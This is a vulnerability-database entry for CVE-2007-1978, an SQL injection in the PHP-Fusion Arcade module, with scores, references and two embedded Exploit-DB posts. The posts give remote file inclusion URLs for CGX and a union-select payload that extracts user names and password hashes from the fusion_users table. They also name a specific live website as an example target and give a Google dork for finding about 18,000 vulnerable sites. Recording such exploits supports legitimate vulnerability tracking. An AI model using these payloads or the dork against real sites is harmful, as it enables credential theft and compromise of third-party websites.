CVE-2007-1978
Published: 2007-04-12
Priority: P338 | Severity: high | CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.03% (59.3th percentile)
SQL injection vulnerability in index.php in the Arcade 1.00 module for PHP-Fusion allows remote attackers to execute arbitrary SQL commands via the cid parameter in a view_game_list action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_fusion | arcade_module | — | — |
No detection rules found.
Exploit-DB
CGX 20050314 - 'pathCGX' Remote File Inclusion
exploitdb·2007-05-08
CVE-2007-2611 CGX 20050314 - 'pathCGX' Remote File Inclusion
---
# CGX 2005-03-14 (pathCGX) Remote File Include Vulnerabilities
# D.Script: http://codigolivre.org.br/frs/?group_id=413&release_id=1978
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/inc/mtdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/ltdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/login.php?pathCGX=Shell
# Exploit:[Path]/inc/logingecon.php?pathCGX=Shell
# All Files in : /frm/ & /sql/ & /cns/
# Greetz To: Tryag-Team ...$$
# milw0rm.com [2007-05-08]
Exploit-DB
PHP-Fusion Module Arcade 1.0 - 'cid' SQL Injection
exploitdb·2007-04-02
CVE-2007-1978 PHP-Fusion Module Arcade 1.0 - 'cid' SQL Injection
---
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
Found by: xoron
xoron.biz
Exploit:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
Example: http://www.basicwallpapers.dk/infusions/arcade/
Google Dork:
/infusions/arcade/ 18.000 sites:)
Ekin0x / --> evilc0der.org <--
# milw0rm.com [2007-04-02]
No writeups or analysis indexed.
References:
http://osvdb.org/37410
http://www.vupen.com/english/advisories/2007/1205
https://exchange.xforce.ibmcloud.com/vulnerabilities/33361
https://www.exploit-db.com/exploits/3640